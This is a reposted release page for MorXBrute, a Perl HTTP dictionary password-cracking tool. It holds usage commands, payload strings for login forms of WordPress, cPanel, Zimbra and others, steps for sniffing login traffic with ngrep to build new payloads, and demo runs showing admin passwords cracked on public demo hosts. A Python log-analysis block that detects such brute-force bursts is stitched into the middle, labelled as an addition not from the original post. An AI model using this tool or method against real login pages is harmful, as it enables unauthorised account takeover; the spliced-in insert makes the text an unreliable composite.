Fi8sVrs

MorXBrute Password Cracker 1.01


Description:

MorXBrute is a customizable HTTP dictionary-based password cracking tool written in Perl.

MorXBrute comes with a few payloads for some of the most popular software packages and additionally lets you add your own payload for your favorite HTTP software or website.

MorXBrute supports both GET and POST brute forcing.

MorXBrute was written for educational, demonstration and testing purposes only.

Author cannot be held responsible for any malicious use or damage.

You can redistribute it and/or modify it under the same terms as Perl itself.

Author:

Simo Ben youssef <Simo_at_morxploit_dot_com>

MorXploit Research

Version:

MorXBrute v1.01 Beta

MD5: b4ea3c6895b9996b72309cc91a5910f8

Release date:

November 08 2013

Download:

Requirements:

Perl 5 or older

Additional modules:

None

Usage:

perl MorXBrute.pl <target:port> <user> <wordlist> <payload file>
perl MorXBrute.pl localhost:80 admin password.lst payloads/wordpressv3.7.1
perl MorXBrute.pl update

Payloads:

As of version 1.01 MorXBrute includes payloads for:

  • Bitrix
  • cPanel
  • everyone email platform
  • Horde
  • Moodle
  • Wordpress
  • Xoops
  • Zimbra

However, the goal of MorXBrute is to be a customizable HTTP brute forcing tool by giving you the ability to create your own payloads and share them with others. Please read below and feel free to contact me if you need help.

How to generate Payloads:

Generating your own payload for your target requires a little work; right now MorXBrute can't do that for you, but I'm considering adding a payload generator in the future.

MorXBrute works by sending either a POST or GET request to the target with the login, the password and any other data required by the target script, then reads the server's response to each request.

The server's response varies from one application to another, just as the login parameters do, but in most cases, after successful authentication, the server responds with HTTP/1.1 302 Found and redirects the browser to a new location. In this case MorXBrute uses the regex Location: (.*) to distinguish a successful login attempt from a failed one.

In some other cases, scripts like Joomla assign a cookie and redirect you to the administration page either way, before the script validates the login cookie. This makes brute forcing slower and is not supported by MorXBrute.

First you will need a network sniffer or if you use Google Chrome you can use the built-in network sniffer in the Developer tools (CTRL + Shift + i). Personally I prefer to use ngrep which can be downloaded from:

ngrep - network grep

or apt-get install ngrep on Debian/Ubuntu and yum install ngrep on Red Hat/Fedora/CentOS

You can then run it to capture your target traffic to analyze by running:

ngrep -q -d interface -W byline host target and port 80 > target.log

ngrep -q -d wlan0 -W byline host mywordpresssite.com and port 80 > wordpress.log

At the login page, send two requests, one with valid login credentials and a second with false login credentials. Once done, go back and check your ngrep logs and gather the following (WordPress example).

Login script path:

POST /wp-login.php
Or when GET is used (not in the WordPress case)
GET /someotherscript.php

Posted data:
log=admin&pwd=somelamepassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.testserver%2Fwp-admin%2F&testcookie=1
or log=admin&pwd=somelamepassword when GET is used (again not in the WordPress case)
GET /someotherscript.php?log=admin&pwd=somelamepassword

On the successful login attempt log, check the rest of the response headers to see if the server responded with a new location.

Example:

Set-Cookie: wordpress_logged_in_b376718910d75b03e67817ec5d3badc4=admin%7C1563339904%7Cba04510cfb75c0a5094246a6f150baee; path=/; httponly.
Location: http://testserver/wp-admin/ <——– HERE
Content-Length: 0
Connection: close

On the failed login attempt log, check for the Location response as well.

If you can't find the Location response in the failed login log, then bingo: that's the server telling you that your password works, and that's our key! Otherwise, if the server responds with the same location either way, then it's probably trying to validate the newly assigned cookie on the next step.

In some rare cases, scripts use the main restricted area (admin panel, mailbox, etc.) script to process login requests. In this case you can easily find the regex key by looking either at the cookie value (BITRIX_SM_LOGIN=admin in the Bitrix case) or at anything different in the HTML code, such as a welcome message ("Welcome user to inbox" as an example), and add it to the payload as Welcome(.*?)to
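The same success signal read from the defender's side, as an added example that is not part of MorXBrute or the original post: it scans constructed web server access log lines for bursts of requests to a login endpoint from one source address and records whether a 302 (the redirect that a Location:(.*) key matches) appeared inside the burst. The login paths, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Nov/2013:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3215
203.0.113.7 - - [08/Nov/2013:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3215
203.0.113.7 - - [08/Nov/2013:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3215
203.0.113.7 - - [08/Nov/2013:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3215
203.0.113.7 - - [08/Nov/2013:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0
198.51.100.4 - - [08/Nov/2013:10:00:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 9001
198.51.100.4 - - [08/Nov/2013:10:03:10 +0000] "POST /wp-login.php HTTP/1.1" 200 3215
198.51.100.4 - - [08/Nov/2013:10:03:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATHS = {"/wp-login.php", "/login.php", "/login"}  # assumed login endpoints

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect_login_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Map each source IP that made >= threshold login requests inside one
    window to its largest burst size and whether a 302 occurred in a burst."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3].split("?", 1)[0] in LOGIN_PATHS:
            events[rec[0]].append((rec[1], rec[4]))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end, (ts, status) in enumerate(evs):
            while ts - evs[start][0] > window:  # keep evs[start:end+1] within window
                start += 1
            burst = evs[start:end + 1]
            if len(burst) >= threshold:
                alert = alerts.setdefault(ip, {"attempts": 0, "succeeded": False})
                alert["attempts"] = max(alert["attempts"], len(burst))
                # a redirect (302) inside the burst is the success signal
                alert["succeeded"] = alert["succeeded"] or status == 302
    return alerts
```

Two legitimate attempts a few seconds apart stay below the threshold, while a rapid run of 200 responses followed by a 302 from the same address is reported as a burst that likely ended in a valid password.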

Payload file structure:

The structure is very simple: there are 4 values separated by a comma ","

1- POST: HTTP method (could be either POST or GET)

2- login.php: the login script path

Note: this is the full path; if your script is installed in a subdirectory, then you should include that too. For example, if your WordPress is installed in http://localhost/wordpress, then you should include it in the payload (POST:wordpress/wp-login.php)

3- login parameters (login and password)

Note: $user and $pwd are used by MorXBrute and should not be changed

4- MorXploit: Cookie value, change if required by the remote login

5- Regex key

POST,login.php,login=$user&password=$pwd,MorXploit,Location:(.*)

Note: Although WordPress takes other data parameters besides log and pwd, such as redirect_to and testcookie, it only requires those first two.

Demo:

POST Method:

root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl demo.opensourcecms.com:80 admin word.lst payloads/wordpressv3.7.1

===================================================
— MorXBrute v1.0 Beta HTTP password cracking tool
— By Simo Ben youssef
— www.morxploit.com
===================================================

[*] target set to demo.opensourcecms.com:80
[*] user set to admin
[*] Wordlist set to word.lst
[*] payload set to payloads/wordpressv3.7.1

[+] Cracking …

[-] test -> Failed
[-] test123 -> Failed
[-] testtest -> Failed
[-] testest123 -> Failed
[-] qwerty -> Failed
[-] azerty -> Failed
[-] password -> Failed
[-] password123 -> Failed
[-] x3demob -> Failed
============================================================
[+] CRACKED! Your password is demo123
[+] Found at line 10 of word.lst
[+] Cracked in 6 seconds
============================================================

GET Method:

root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl x3demob.cpx3demo.com:2082 x3demob word.lst payloads/cpanelgetprov1.0

===================================================
— MorXBrute v1.0 Beta HTTP password cracking tool
— By Simo Ben youssef
— www.morxploit.com
===================================================

[*] target set to x3demob.cpx3demo.com:2082
[*] user set to x3demob
[*] Wordlist set to word.lst
[*] payload set to payloads/cpanelgetprov1.0

[+] Cracking …

[-] test -> Failed
[-] test123 -> Failed
[-] testtest -> Failed
[-] testest123 -> Failed
[-] qwerty -> Failed
[-] azerty -> Failed
[-] password -> Failed
[-] password123 -> Failed
============================================================
[+] CRACKED! Your password is x3demob
[+] Found at line 9 of word.lst
[+] Cracked in 4 seconds
============================================================

TODO:

Add SSL support

Add a payload generator

And maybe more?

Submit your payloads:

Your contribution is needed! Please submit your payloads to simo_at_morxploit_com

Make sure to include software/service details such as name, URL and version number

Also please feel free to submit all your suggestions and bugs.

Thanks and happy MorXBruteForcing!

Source: MorXBrute HTTP Password cracking tool

Edited by Fi8sVrs